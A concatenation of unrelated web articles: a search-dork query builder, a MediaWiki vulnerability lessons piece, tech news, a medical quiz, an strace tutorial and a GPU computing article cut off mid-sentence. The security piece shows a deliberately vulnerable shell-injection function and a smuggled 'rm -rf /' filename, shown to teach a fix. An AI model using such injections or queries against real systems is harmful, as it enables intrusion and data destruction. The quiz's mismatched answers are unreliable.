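The advanced operators shown above can also be composed with a few lines of scripting. The sketch below is not part of SEAT (which is written in Perl); it merely assembles query strings of the site:/inurl:/ext: form for manual review, and the default word lists are illustrative guesses rather than SEAT's dictionaries.

```python
def build_queries(target,
                  terms=("password", "confidential"),
                  file_types=("pdf", "xls"),
                  url_words=("admin", "backup")):
    """Compose advanced-search strings, mirroring the operators described above."""
    queries = [f"site:{target} {t}" for t in terms]
    queries += [f"site:{target} ext:{ft}" for ft in file_types]
    queries += [f"site:{target} inurl:{w}" for w in url_words]
    return queries

# Print the queries so they can be pasted into a search engine manually.
# (Automating the requests is what gets source IPs blacklisted, as noted above.)
for q in build_queries("rootshell.be"):
    print(q)
```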
Check out the official website: midnightresearch.com.
https://blog.rootshell.be/2009/03/21/introduction-to-seat/
3 Web Security Takeaways From Wikipedia's Near Miss

Even the most useful and benevolent websites have the potential to host malware.

Last month, researchers in our Vulnerability Research Group found a critical vulnerability in MediaWiki, the open-source web platform that is used to create and maintain wiki websites, including Wikipedia.org, the sixth most visited website in the world. This critical vulnerability left the MediaWiki platform (version 1.8 onward) exposed to a remote code execution (RCE) attack. An attacker could have used this vulnerability to gain complete control of the Wikipedia web servers, potentially exposing Wikipedia's 94 million monthly visitors to malware or massive information disclosure.

Since an update and patch has been issued to the MediaWiki software, the vulnerability has been exposed and resolved, so long as all MediaWiki users install the patch. However, there are still some useful lessons we can take away from this near miss.

Lesson No. 1: Know your stack

The RCE vulnerability was only the third of its kind found in the widely used, open-source MediaWiki platform since 2006. That's a good track record, but it demonstrates how easily organizations can be lulled into a false sense of security just because a vulnerability has not been announced in months or even years on the platforms they use.

Web application server stacks expose a broad software surface for an attacker on the vulnerability hunt. Even the most minimal setups typically overlay a web framework (e.g., WordPress) based on a platform language (PHP), using a database (MySQL) in a web server (Apache) over an operating system stack. Any of these components can be an exploitation candidate -- and we haven't even mentioned custom application business logic, imported JS libraries, plugins, mods, and other extras. The opportunities are abundant.

In addition to keeping a vigilant eye for vulnerabilities on the development side, it's more important than ever to keep your software updated across the board. Make sure you are running recent versions of your framework and services, running on top of a modern OS with built-in exploit mitigation techniques and other native protections enabled, or look into threat prevention technology. Best practices would recommend doing all three; follow your vendor's hardening guides.

Lesson No. 2: Occam's razor still cuts true

The slightly more modern version of Occam's razor is KISS (keep it simple, stupid). Both axioms hold true in this case: the simplest answer is usually the right one. Though we've seen a steady rise in sophisticated threat vectors, and advanced persistent threats, mobile device breaches, DDoS attacks, and even international bank heists make headlines, relatively simple attacks through vulnerabilities like the one we discovered in the MediaWiki platform are still a very real and common threat. Worse, some input validation vulnerabilities tend to go unnoticed because the exploitation techniques are not particularly new or technically advanced. This presents an attractive target, since attackers are always looking for the path of least resistance.

It's akin to putting up the "Beware of Dogs" sign, keeping a big dog in the backyard, arming your sophisticated home protection system with mobile alerts, bolting the front door, locking the back gate, and then leaving one of the front windows open. Sometimes those simple, obvious entry points are the most lucrative for criminals -- and the most overlooked by developers and site owners.

Lesson No. 3: No such thing as a safe click

Even the most trusted sites are susceptible to exploits like this RCE vulnerability. But if you put appropriate protections in place, you can detect and block infecting code before it spreads to your clients and servers. It's not practical to block employees on your network from all sites, and as this case shows, even the most useful and benevolent sites can host malicious code.
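The MediaWiki code path is not reproduced here, but the general class of bug (unvalidated input reaching a sensitive sink) is easy to illustrate. The following Python fragment is a generic, hypothetical example of the pattern and one way to close it; it is not the vulnerability described above, and the filenames and commands are invented for illustration.

```python
import re
import subprocess

# Vulnerable pattern: user-controlled input is interpolated into a shell command,
# so a filename like "x.png; rm -rf /" smuggles in an attacker-supplied command.
def make_thumbnail_unsafe(filename):
    subprocess.run(f"convert {filename} -resize 120x120 thumb.png", shell=True)

# Safer pattern: validate input against a strict whitelist and avoid the shell entirely.
SAFE_NAME = re.compile(r"[\w.-]+\.(png|jpe?g|gif)")

def make_thumbnail_safe(filename):
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected suspicious filename: {filename!r}")
    subprocess.run(["convert", filename, "-resize", "120x120", "thumb.png"], check=True)
```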
http://www.darkreading.com/vulnerabilities-and-threats/3-web-security-takeaways-from-wikipedias-near-miss/d/d-id/1113772?piddl_msgorder=thrd
NASA Mars Rover Landing Empowered by Dell Systems
By CIOinsight | Posted 08-07-2012

Dell announced that its systems supported the landing of NASA's new Mars rover, Curiosity. Dell systems played a key role in the most complicated portion of the mission, with data analysis conducted in two NASA High Performance Computing (HPC) clusters running Dell PowerEdge servers.

Managed by NASA's Jet Propulsion Laboratory (JPL) in Pasadena, California, the Mars rover, Curiosity, is the largest rover ever sent to explore the Red Planet. Launched on Nov. 26, 2011, Curiosity landed on the Red Planet at 10:32 p.m. Pacific Daylight Time on Aug. 5, 2012 near the base of a mountain inside the Gale Crater near the Martian equator. Researchers plan to use Curiosity to study the mountain's layers, which hold evidence about the wet environments of early Mars and may hold clues about whether the planet ever offered conditions favorable for life. The rolling laboratory will search for two things: environments where life might have existed, and the capacity of those environments to preserve evidence of past life.

"We're proud to work hand-in-hand with NASA, a true American institution that provides the world with the understanding that modern day pioneering delivers optimism and the drive to go further," said Jere Carroll, general manager for civilian agencies at Dell Federal, in a statement. "This notion echoes Dell's mission to provide customers with a full spectrum of IT hardware and services, helping them to accomplish their mission more effectively and efficiently. Most importantly, we are honored to be able to test and validate this mission's most critical portion, landing on the Red Planet."

JPL's Dell HPC clusters, Galaxy and Nebula, provided vital support to NASA's Curiosity rover in analyzing the vast amounts of test data needed to correctly prepare the rover for entering the Martian atmosphere and landing it on the planet. This difficult task was powered by the Dell PowerEdge servers that make up the Galaxy and Nebula clusters. The final landing sequence parameters developed by the mission team, which were tested and validated using the Dell HPC clusters, were uploaded last week to Curiosity, Dell officials said.

NASA officials said Curiosity's main assignment is to investigate whether its study area ever has offered environmental conditions favorable for microbial life. To do that, it packs a science payload weighing 15 times as much as the science instruments on previous Mars rovers. The landing target, an area about 12 miles by 4 miles (20 kilometers by 7 kilometers), sits in a safely flat area between less-safe slopes of the rim of Gale Crater and the crater's central peak, informally called Mount Sharp. The target was plotted to be within driving distance of layers on Mount Sharp, where minerals that formed in water have been seen from orbit, NASA said.

With the successful landing, the 1-ton rover's two-year prime mission on the surface of Mars has begun. However, one of the rover's 10 science instruments, the Radiation Assessment Detector (RAD), already has logged 221 days collecting data since the spacecraft was launched on its trip to Mars last November.
http://www.cioinsight.com/print/c/a/Latest-News/NASA-Mars-Rover-Landing-Empowered-by-Dell-Systems-413134
Medicine and Health - Quiz Questions & Answers - What do you call the Chinese system of healing with insertions of needles into the body? - Which British biochemist first found the presence of vitamins in fresh food? - (a) What oil is sometimes applied to gums and teeth to relieve pain? (b) What is the name of the drug or preparation used to induce vomiting, especially in food-poisoning? - What is the difference between an artery and a vein? - Match the following with their particular fields: (a) Joseph Lister - Blood circulation (b) Alexander Fleming - Bacteriology (c) Christian Barnard - Antiseptic surgery (d) William Harvey - Penicillin (e) Louis Pasteur - Heart transplant - (a) Who is a Hypochondriac? (b) Give one word for the time of compulsory isolation to prevent the spread of infection or contagion. - (a) What do you suffer from if you have Halitosis? (b) What is the common name for Hypertension? - (a) What are the four major blood types? (b) In which part of the body are blood cells manufactured? - What do the following stand for? - (a) Who is regarded as the ‘Father of Plastic Surgery’? (b) What is Homoeopathy? - (a) Where would you find the medulla oblongata? (b) Which organ contains the Islets of Langerhans? - (a) What is the medical name for Lockjaw? (b) What is the medical name for Cancer of the Blood? - What do the following specialize in: - What are these (a) goose bumps (b) funny bone (c) writer’s finger - What is considered to be (a) the normal temperature of the human body (b) the pulse rate of a healthy adult - Which is (a) the largest bone in the human body? (b) the smallest bone in the human body? - What is the name given to the AIDS virus? - (a) To which bone is the tongue attached? (b) What substance must mix with food to give taste? (c) What are you if you are short-sighted? - For what is Sir Jonas Salk credited? - Curing kidney stones without surgery has become possible in recent times. What is the name of the new method which uses certain waves to smash kidney stones? Answers of Quiz Questions about Medicine & Health - Sir Frederick Gowland Hopkins - (a) Oil of cloves (b) An emetic - An artery carries blood from the heart, while a vein conveys blood back to the heart - (a) Joseph Lister - Antiseptic surgery (b) Alexander Fleming - Penicillin (c) Christian Barnard - Heart transplant (d) William Harvey - Blood circulation (e) Louis Pasteur - Bacteriology - (a) a person who continually imagines he is ill - (a) bad breath (b) high blood pressure - (a) A, B, AB, O (b) The bone-marrow - (a) Electro Cardiogram (b) Electro Convulsive Therapy - (a) Susruta, the ancient Indian man of medicine (b) Treatment of disease would produce symptoms of the disease. - (a) In the brain (b) The Pancreas - (a) Tetanus - (a) Study of skull features (b) diseases of old age (c) Care and treatment of infants and children (d) a specialist in the treatment of problems concerning the position of the teeth and jaws. (e) X-rays body parts and organs for diagnosis - (a) Tiny muscles under the skin’s surface which contract and make the hairs stand up, causing small bumps. (b) The spot on the back of the elbow where the ulna nerve rests against the humerus bone (c) A callus or hardening of the skin caused by constant pressure from holding a pen or pencil - (a) 98.4F (b) 70-80 beats - (a) the femur or thigh bone (b) the stirrup or stapes in the ear - HIV (Human Immunodeficiency Virus) - (a) The hyoid bone - For introducing a vaccine against Poliomyelitis in 1954. 
http://www.knowledgepublisher.com/article-732.html
Ten years ago, if you went to pick up a phone call, your voice would have been carried across the same copper-wire technology that powered America’s very first telephone system. Today? With recent advances, at least some of your call would be routed through pipes that also carry Internet traffic. This new way of handling phone conversation is mostly invisible, and it’s unlikely to make a huge difference in the way we actually place a call. But for a small share of Americans, the change could help them catch up to a new economy that’s largely left them behind. What does a revamped telephone backbone have to do with lifting people’s fortunes? It begins with a nationwide movement to replace the country’s ancient phone infrastructure with one that runs primarily on fiberoptic cables. Recall the last decade, when the country moved from analog to all-digital television. What’s happening now in telephony is a lot like that, only customers won’t have to lift a finger to experience its benefits. Here’s how it works: Fiberoptic cables are super-efficient at transferring large amounts of data quickly; it’s the reason why Verizon can say its FiOS service is capable of downloading a feature-length HD movie to your computer in two minutes, less than the time it takes to microwave your popcorn. What the switch to Internet-protocol telephony does is move voice traffic onto those fiberoptic cables, and in so doing, make telephone calls indistinguishable from Internet traffic. Pretty soon -- telecom experts believe the all-IP transition will be complete by 2018 -- an ordinary phone call will work in much the same way that calls over Skype or Google Voice do now. “Voice is becoming just another application riding over the Internet backbone,” said FCC commissioner Ajit Pai at a Q&A session in Washington last week. Instead of the divide we’re used to between voice and data, voice is simply going to become a form of data. Whether they realize it or not, many Americans already use this system. In fact, Pai said, less than one-third of the country still subscribes to what the industry colloquially calls POTS, or plain old telephone service. In some ways, “all-IP” is simply a codeword for putting POTS out to pasture. As companies move more of their voice traffic onto high-speed fiberoptic networks, what bandwidth is left over will become conveniently available to thousands or perhaps millions who’ve never had access to high-speed Internet before. The expansion would be a boon to distant and disadvantaged parts of the country, where traditional Internet providers once balked at the cost of building to the last mile. It’s still expensive to rip up copper cables and replace them with fiber. But it’s much less expensive to do it as an upgrade to a system everyone already has rather than to build something out of nothing. You aren’t going to wake up one morning and find every home connected to Verizon FiOS. In fact, even after the IP transition, many houses are still going to be connected to their local switch by copper. But what’s connecting the switch to the rest of the world will be fiber -- and overall, that’ll boost Internet bandwidth considerably, according to executives at Frontier Communications, a telephone company that serves mainly rural and small communities in the United States. “We’re just starting to understand the benefits that are out there,” said Jennifer Schneider, Frontier’s vice president for legislative affairs. 
“I don’t know that we can quantify it right now.” That hasn’t stopped some from trying. One approach taken by recent studies is to assess what’s called “consumer surplus,” or the gap between the highest price someone is willing to pay for a good and what they actually paid for it. When it comes to online tools such as e-mail, it turns out people are open to shelling out quite a bit -- even if the product is provided to them for free. “On average,” reported The Economist, “households would pay €38 ($50) a month each for services they now get free. After subtracting the costs associated with intrusive ads and forgone privacy, McKinsey reckoned free ad-supported Internet services generated €32 billion of consumer surplus in America and and €69 billion in Europe.” There are other ways to think about consumer surplus, The Economist added. Think of all the poking around in the Dewey decimal system you no longer have to do, thanks to online search engines. The search industry alone generates between $65 billion and $150 billion in time savings nationally every year, according to the report. While wealthy America has surged ahead, in some cases creating whole new economies online and virtual currencies to use within them, those without broadband have been shut out and unable to participate even if they wanted to. Americans in rural and underprivileged areas would almost surely benefit from these consumer surpluses, just as the rest of us have. It’s hard to say how a lack of broadband access may have actually held back economic development in these places. But we do know that a digital divide is alive and well in the United States. While the broadband penetration rate tops 90 percent among households making over $50,000 a year, that figure drops to 68 percent for homes bringing in $30,000-$50,000 a year, and to less than half in households making under $30,000. Now let’s look at the problem geographically. Two percent of respondents to a survey conducted by the Leichtman Research Group said broadband simply wasn’t available in their area. Of that group, a majority said they’d buy a high-speed subscription if they could. Overall, about two-thirds of a percent said they wanted to get broadband but couldn’t afford it. Two percent of America doesn’t sound like a lot. But it’s actually about 6 million people -- more than the population of Los Angeles, the second-largest city in the United States. Imagine if LA and its surroundings suddenly dropped off the face of the Web and couldn’t get back on. The transition to all-IP telephony should help close the digital divide for some of the country’s neediest. It may not make a huge difference right away or even within a few years. But if the trajectory of these Americans resembles anything like that of their urban counterparts, we might expect great things from them.
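The "2 percent is about 6 million people" figure above is easy to sanity-check. A minimal Python sketch follows; the population constant of roughly 315 million is an assumption standing in for the 2013 U.S. population, not a number taken from the article.

# Back-of-the-envelope check of the "2 percent is about 6 million people" claim.
# The population figure is an assumed round number, not data from the article.
US_POPULATION = 315_000_000

def people_without_broadband(share_without_access, population=US_POPULATION):
    # Convert a percentage of the population into a headcount.
    return round(population * share_without_access)

print(people_without_broadband(0.02))   # ~6,300,000 -- roughly the population of greater Los Angeles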
Thinking there could be life on one of Jupiter's moons, NASA scientists are working on a plan to send robots to begin studying it. Jim Green, NASA's planetary science chief, said there's no reason to think there isn't life on Europa, the sixth-closest moon to the planet Jupiter and the sixth-largest moon in the solar system. And he can't wait to find out. NASA administrator Charles Bolden said this week that the space agency's 2015 proposed budget includes funding for a robotic mission to Europa. Green noted that NASA hopes to launch the first of a series of robotic missions to Europa in the mid-2020s. "We've been thinking about Europa for quite a few years. Then in December things had to change," Green told Computerworld. "The ocean there is protected by an ice shell and there's no reason that we believe life couldn't have been generated on Europa. The real search for aliens is in this solar system. To determine if life exists outside the bounds of Earth's gravity, it's really in places like Mars and Europa and maybe Titan." If NASA does find life -- whether it's microbial or other life forms -- that will have major repercussions on what we expect about life outside the bounds of Earth. "If we can find life there, either past life or current life, then that tells us life has to be everywhere in this galaxy," said Green. "It's an extreme environment, but not as extreme as we think. It's in a temperature range that life, as we know it, is abundant but does it have the right chemicals to create life and feed life? There's no reason to think that the evolution of life in that environment didn't just take off." In December, the Hubble Space Telescope spotted a huge water plume emanating from the south pole of Europa. Green said it wasn't a small geyser like Old Faithful in Yellowstone National Park, which shoots up 90 to 180 feet in the air. The geyser coming off Europa shoots up more than 124 miles. Green explained that Europa is covered by an ice shell. However, the strong tidal pull from Jupiter has melted some of that ice and created a deep ocean below it. Europa's ocean, which has hydrothermal vents, is about 62 miles deep and covers the entire moon. That's about 10 times deeper than the ocean here on Earth, and it holds twice as much water as is found here. "It's a really dynamic region," said Green. "It's a fabulous water world. We believe life probably started in water on this planet. Having billions of years of water on Europa tells us there's a good chance there's life on Europa now." It's not clear what NASA will first send to Europa. It could be a spacecraft similar to Cassini that will repeatedly fly past the moon, sending back information about it. However, the first mission also could be a spacecraft that will go into orbit around Europa, studying its surface, the geyser and gases. After that mission, whatever it might entail, sends back data, NASA will send another robot -- one that will likely land on Europa's ice shell. "We're in the process of studying it," said Green. "Now that we're seeing the plumes, we have new ideas we never had before. We're in the pre-formulation phase. We're bringing the ideas together and figuring out what that first mission might be. There'll be a series of robotic missions." Using current rocket technology, it would probably take eight to nine years for a spacecraft to reach Europa.
However, if NASA uses one of the new heavy-lift rockets it's been working on, that trip could be shortened to two years. NASA scientists speculate there might be life currently on Europa and are planning the first of a series of robotic missions to study Jupiter's moon. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center. This story, "NASA will send a robot to investigate suspected life on Europa" was originally published by Computerworld.
Telemetry is the automated communications process by which measurements are made and data collected at remote points. The data is then transmitted to receiving equipment for monitoring. The word 'telemetry' is derived from Greek roots: tele = remote, and metron = measure. Telemetry is not a new concept, that's for sure. We've been watching telemetry at work for decades; for example, we've strapped transmitters onto migrating animals, moored weather buoys, and run seismic monitoring networks. However, the use of telemetry continues to accelerate, and this technology will pose huge challenges to those of us responsible for data collection, data integration, and data analysis. The most recent rise of telemetry is around the use of new and inexpensive devices that we now employ to gather all kinds of data. These can range from Fitbits that seem to be attached to everyone these days to count the steps we take, to smart thermostats that monitor temperature and humidity, to information kicked off by our automobiles about the health of the engine. The rise of the "Internet of Things" is part of this as well. This is a buzzword invention of an industry looking to put a name to the rapid appearance of many devices that can produce data, as well as the ability of these devices to self-analyze and thus self-correct. MRI machines in hospitals, robots on factory floors, as well as motion sensors that record employee activity are just a few of the things that are now spinning off megabytes of data each day. Typically, this type of information flows out of devices as streams of unstructured data. In some cases, the data is persisted at the device, and in some cases not. In any event, the information needs to be collected, put into an appropriate structure for storage, perhaps combined with other data, and stored in a transactional database. From there, the data can be further transferred to an analytics-oriented database, or analyzed in place. Problems arise when it comes time to deal with that information. Obviously, data integration is critical to most telemetry operations. The information must be managed from point to point, and then persisted within transactional or analytics databases. While this is certainly something we've done for some time, the volume of information that these remote devices spin off is new, and thus we face a growing need to manage that volume of data effectively. Take the case of the new health telemetry devices that are coming onto the market. They can monitor most of our vitals, including blood pressure, respiration, oxygen saturation, and heart rate, at sub-second intervals. These sensors typically transmit the data to a smart phone, where the information is formatted for transfer to a remote database, typically in the cloud. The value of this data is very high. By gathering this data over time, and running analytics against known data patterns, we can determine the true path of our health. Perhaps we will be able to spot a heart attack or other major health issues before they actually happen. Or, this information could lead to better treatment and outcome data, considering that the symptoms, treatment, and outcomes will now be closely monitored over a span of years. While the amount of data was relatively reasonable in the past, the number of data points and the frequency of collection are exploding. It's imperative that we figure out the best path to data integration for the expanding use of telemetry.
A few needs are certain:
- The need to gather information from hundreds, perhaps thousands, of data points and devices at the same time. Thus, we have to identify the source of the data, as well as how the data should be managed in flight and when stored at a target.
- The need to deal with megabytes, perhaps gigabytes, of data per hour coming off a single device, where once it was only a few kilobytes. Given the expanding number of devices (our previous point), the math is easy: the amount of data that needs to be transmitted and processed is exploding.
- The need to address the data governance and data quality issues that these massive amounts of data will drive, and to address them at the data integration layer. Data is typically not validated when it's generated by a device, but it must be checked at some point. Moreover, the complexity of these systems means that the use of data governance approaches and technology is an imperative.
This is exciting stuff, if you ask me. We're learning to gather the right data, at greater volumes, and leverage that data for more valuable outcomes. This data state has been the objective for years, but it was never really obtainable. Today's telemetry advances mean we have a great opportunity in front of us.
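To make the collect-validate-structure step described above concrete, here is a minimal Python sketch. The payload field names (device_id, metric, value) and the validation ranges are illustrative assumptions, not part of any particular telemetry product or standard.

import json
from datetime import datetime, timezone

# Minimal sketch of the collect-validate-structure step: take one unstructured
# reading off a device, apply a basic data-quality gate at the integration
# layer, and emit a structured row ready for a transactional store.
EXPECTED_RANGES = {"heart_rate": (20, 250), "spo2": (50, 100)}   # assumed plausibility limits

def ingest(raw_message):
    record = json.loads(raw_message)                      # unstructured payload from the device
    metric, value = record["metric"], float(record["value"])
    low, high = EXPECTED_RANGES.get(metric, (float("-inf"), float("inf")))
    if not low <= value <= high:                          # reject readings outside the expected range
        raise ValueError(f"{metric}={value} outside expected range")
    return {                                              # structured, timestamped row for storage
        "device_id": record["device_id"],
        "metric": metric,
        "value": value,
        "received_at": datetime.now(timezone.utc).isoformat(),
    }

print(ingest('{"device_id": "wrist-0042", "metric": "heart_rate", "value": 72}'))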
New Threats Leave Less Room for Error As the number of broadband users increases, the ripple effect of any security vulnerability becomes much greater. Combine that with a wide array of new virtual threats, and you have a much more susceptible IT environment, said David Redekop, co-founder of Nerds On-Site, a kind of brain trust for assisting enterprises and individual consumers with IT products and concepts. “We used to have reasonably big windows when a security vulnerability was discovered,” he said. “We would find out about it and say, ‘That’s a bit of risk for our customers. We should plan on patching that system.’ As the number of broadband users—and potentially malicious users—grows, those windows are getting smaller and smaller.” Although it used to be acceptable to employ a reactive, patch-as-you-go strategy, information security professionals have to take more preventative measures today. “You can no longer assume that you’re going to get a warning, and you can patch it and then you’re safe,” Redekop said. “You have to assume that by the time you’ve been warned, that particular exploit has been tested on your network by some zombie or some hacker. All of a sudden, we have to put big fences around our (network), and additional fences just in case there are some holes we weren’t aware of.” Redekop recommends using reverse firewalls to cut down on spam and prevent malware from slipping in and out through back doors. “A reverse firewall virtually inspects any computer’s outbound request,” he said. “Spam is sent out by some piece of spyware on the users’ computers that helps the spammers’ cause by sending out masses of e-mails. A reverse firewall implementation (ensures) computers on a network can only send mail through a server, which inspects for viruses and spam. It’s an easy implementation, and it can be done on any professional-grade router.” Users also need to be aware of the vulnerability of information sent through wireless networks or in public hot spots. Part of the problem is that more than 90 percent of users still use clear-text e-mail in all situations, Redekop said. Hackers use Cain-and-Abel programs to pick up traffic in exposed areas like this, and can intercept user names and passwords relatively easily. To avoid compromising sensitive information, he suggests using at least some level of encryption to send and receive e-mail. For more information, see http://www.nerdsonsite.us.
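The reverse-firewall idea Redekop describes is ultimately a policy decision: only the mail server may speak SMTP to the outside world, and it scans traffic before relaying it. The toy Python sketch below illustrates that policy as a single rule check; the addresses are made up, and a real deployment would express the same rule on a professional-grade router or firewall rather than in application code.

import ipaddress

# Toy illustration of the reverse-firewall policy described above: outbound SMTP
# (TCP port 25) is allowed only from the designated mail server. All addresses
# here are invented examples.
MAIL_SERVER = ipaddress.ip_address("192.168.1.25")
SMTP_PORT = 25

def allow_outbound(src_ip, dst_port):
    if dst_port == SMTP_PORT:
        return ipaddress.ip_address(src_ip) == MAIL_SERVER
    return True  # everything else falls through to whatever other rules exist

print(allow_outbound("192.168.1.25", 25))   # True  -- the mail server may send
print(allow_outbound("192.168.1.77", 25))   # False -- a desktop (possibly a spam zombie) may not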
strace - trace system calls and signals
strace [ -dffhiqrtttTvxx ] [ -acolumn ] [ -eexpr ] ... [ -ofile ] [ -ppid ] ... [ -sstrsize ] [ -uusername ] [ -Evar=val ] ... [ -Evar ] ... [ command [ arg ... ] ]
strace -c [ -eexpr ] ... [ -Ooverhead ] [ -Ssortby ] [ command [ arg ... ] ]
In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.
So as the above man page excerpt suggests, this article is going to be about strace, how you can utilize it, and when it can be used. Before proceeding with any additional information, the best thing to do at this point is to simply use strace, get a feel for its output, and start analyzing that output so you understand the information being printed to the screen. Here is an easy example that runs strace on the parent apache process on a CentOS installation:
strace -p`cat /var/run/httpd.pid`
Assuming this is the first strace command you have run, let's take a moment and analyze it. The first and most obvious part is the command itself, followed by the "-p" switch. The "-p" switch tells strace that you want to trace a process ID. In this case we are getting the process ID from a pid file, however it can also be typed in manually, such as:
strace -p12345
Now you may or may not immediately see output. If the process is in a "sleeping" or "waiting" status, waiting to be utilized, there may not be any data printed to the screen, in which case you may need to wait a moment or verify the process ID you are trying to attach to. To detach, press CTRL+C.
So by now you should see that strace can provide a wealth of data about what a process is currently doing. Unfortunately there is no "easy" way to jump into using strace due to the massive amount of data it can provide, so this section will provide you with some examples which you can re-create on your own server to demonstrate how it can be used. For this example we are simply using apache. We will already know why it's broken, and a normal apache restart would also tell you why it is broken; however, this example demonstrates how you could utilize strace to identify a similar problem in software that doesn't pinpoint the problem so clearly, or that provides a convoluted error code. With that said, follow these steps (DO NOT FOLLOW THESE UNLESS YOU ARE ON YOUR OWN SERVER, OR A TESTING ENVIRONMENT!!!):
[root@dev ~]# cd /tmp
[root@dev tmp]# mv /etc/httpd/conf/httpd.conf /etc/httpd/conf/httpd.conf.bak
[root@dev tmp]# strace /etc/init.d/httpd restart
Now within the information that was printed on your screen, you should find a line that looks like this:
waitpid(-1, httpd: Could not open configuration file /etc/httpd/conf/httpd.conf: No such file or directory
The error shown above is pretty obvious in terms of what the underlying problem would be. However, information like this, as minor as it may be, can help save you hours of work. Additional messages you may see here are ones reflecting "permission denied", "Inappropriate ioctl for device", and "No such file or directory". These will be very common in various software distributions such as apache, MySQL, vsftpd and so forth, which can make some of the information a bit confusing. Keep in mind that on a Linux system, if software fails it generally quits right where it is.
With that said, the information you are normally looking for is printed right before the strace stops. The easiest way to look for errors is by reading through the data and looking for "-1", which is your error indicator; "0" indicates success. Keep in mind that strace will not always provide you useful information for every problem; however, it can help you determine what the software is doing in the background, which may assist you in troubleshooting or debugging a problem.
Options and Examples
The following "switches" and examples are ones that I would personally suggest and use. Along with them are excerpts from the strace man page.
-f Trace child processes as they are created by currently traced processes as a result of the fork(2) system call.
-ff If the -o filename option is in effect, each process's trace is written to filename.pid where pid is the numeric process id of each process. This is incompatible with -c, since no per-process counts are kept.
-v Print unabbreviated versions of environment, stat, termios, etc. calls. These structures are very common in calls and so the default behavior displays a reasonable subset of structure members. Use this option to get all of the details.
-o Write the trace output to the file filename rather than to stderr. Use filename.pid if -ff is used. If the argument begins with '|' or with '!' then the rest of the argument is treated as a command and all output is piped to it. This is convenient for piping the debugging output to a program without affecting the redirections of executed programs.
strace a process id from a pid file:
strace -p`cat /var/run/file.pid`
strace a process id and output to a file:
strace -p12345 -o /tmp/filename.txt
strace a process and follow all forks:
strace -ff -p12345
combining all of the above:
strace -ff -o /tmp/outfile.txt -p`cat /var/run/httpd.pid`
Hopefully by now you have a pretty solid basic understanding of how to use strace, and how it can be beneficial in saving you time and effort when troubleshooting an issue that is consuming your day. Again, strace will not always provide you with the information you need; however, when you are running out of ideas or options, it is a great tool to turn to. To become more versed in utilizing strace, get familiar with its options, learn how to correctly use them, understand the information they provide you and, of course, use it. The best way to become good at something is to practice.
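Building on the "look for -1" tip above, here is a small, optional Python helper that scans an strace log saved with -o and prints only the calls that failed. It assumes the usual strace output format, in which failed calls end with "= -1" followed by an errno name.

import re, sys

# Scan a saved strace log (e.g. produced with -o /tmp/outfile.txt) and print
# only the lines where a system call returned -1, i.e. the failures, along
# with the errno text strace prints after them.
FAILED = re.compile(r"= -1\s+(E[A-Z]+)")

def failed_calls(path):
    with open(path) as log:
        for line in log:
            if FAILED.search(line):
                yield line.rstrip()

if __name__ == "__main__":
    # usage: python strace_errors.py /tmp/outfile.txt
    for line in failed_calls(sys.argv[1]):
        print(line)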
While computer gamers are eagerly awaiting the next generation of platforms, the computer scientists of Lawrence Livermore's Graphics Architectures for Intelligence Applications (GAIA) project are tracking the rapidly changing technology, but for a different reason. A team, led by John Johnson of the Computation Directorate, is researching graphics processing units (GPUs), the highly specialized, low-cost rendering engines at the heart of the gaming industry, to determine how they might be programmed and used in applications other than virtual entertainment. "Graphics processors are accelerating in performance much faster than other microprocessors," says Sheila Vaidya, project leader for GAIA. "We have an opportunity to ride the wave of innovations driving the gaming industry." These processors — traditionally designed for fast rendering of visual simulations, virtual reality, and computer gaming — could provide efficient solutions to some of the most challenging computing needs facing the intelligence and military communities. Real-time data-processing capabilities are needed for applications ranging from text and speech processing to image analysis for automated targeting and tracking.
Gaming the System
The GAIA team, including collaborators from Stanford University, the University of California at Berkeley and Davis, and Mississippi State University, is researching graphics processors used in the computer gaming and entertainment industries to determine how they might be used in knowledge-discovery applications of relevance to national security. Why bother with this class of processors when plenty of central processing units (CPUs) exist to do the heavy-duty work in high-performance computing? Two words: speed and cost. The ever-growing appetite of the three-dimensional (3D) interactive gaming community has led to the development and enhancement of GPUs at a rate faster than the performance improvements Moore's Law predicts for conventional microprocessors. This acceleration in performance will likely continue as long as the demand exists and integrated-circuit technologies continue to scale. During the past 2 years, the GAIA team has implemented many algorithms on current-generation CPUs and GPUs to compare their performance. The benchmarks that followed showed amazing performance gains of one to two orders of magnitude on GPUs for a variety of applications, such as georegistration, hyperspectral imaging, speech recognition, image processing, bioinformatics, and seismic exploration. GPUs have a number of features that make them attractive for both image- and data-processing applications. For example, they are designed to exploit the highly parallel nature of graphics-rendering algorithms, and they efficiently use the hundreds of processing units available on-chip for parallel computing. Thus, one operation can be simultaneously performed on multiple data sets in an architecture known as single-instruction, multiple data (SIMD), providing extremely high-performance arithmetic capabilities for specific classes of applications. Current high-end GPU chips can handle up to 24 pipelines of data per chip and perform hundreds of billions of operations per second. Today's commercial GPUs are relatively inexpensive as well. "National retailers charge a few hundred dollars for one, compared to the thousands of dollars or more that a custom-built coprocessor might cost," says Johnson. The performance of these GPUs is impressive when compared with that of even the newest CPUs.
“A modern CPU performs about 25 billion floating-point operations per second,” says Johnson. “Whereas a leading-edge GPU, such as the NVIDIA GeForce 7800 GTX video card or the upcoming successor to the ATI Radeon X850, performs six times faster at half the cost of a CPU.” These GPUs are optimized for calculating the floating-point arithmetic associated with 3D graphics and for performing large numbers of operations simultaneously. GPUs also feature a high on-chip memory bandwidth, that is, a large data-carrying capacity, and have begun to support more advanced instructions used in general-purpose computing. When combined with conventional CPUs and some artful programming, these devices could be used for a variety of high-throughput applications. “GPUs work well on problems that can be broken down into many small, independent tasks,” explains GAIA team member Dave Bremer. Each task in the problem is matched with a pixel in an output image. A short program is loaded into the GPU, which is executed once for every pixel drawn, and the results from each execution are stored in an image. As the image is being drawn, many tasks are being executed simultaneously through the GPU's numerous pipelines. Finally, the results of the problem are copied back to an adjacent CPU. However, general-purpose programming on GPUs still poses significant challenges. Because the tasks performed on a GPU occur in an order that is not controlled by a programmer, no one task can depend on the results of a previous one, and tasks cannot write to the same memory. Consequently, image convolution operations work extremely well (100 times faster) because output pixels are computed independently, but computing a global sum becomes very complex because there is no shared memory. “Data must be copied in and out of the GPU over a relatively slow transmission path,” says GAIA team member Jeremy Meredith. “As a result, memory-intensive computations that require 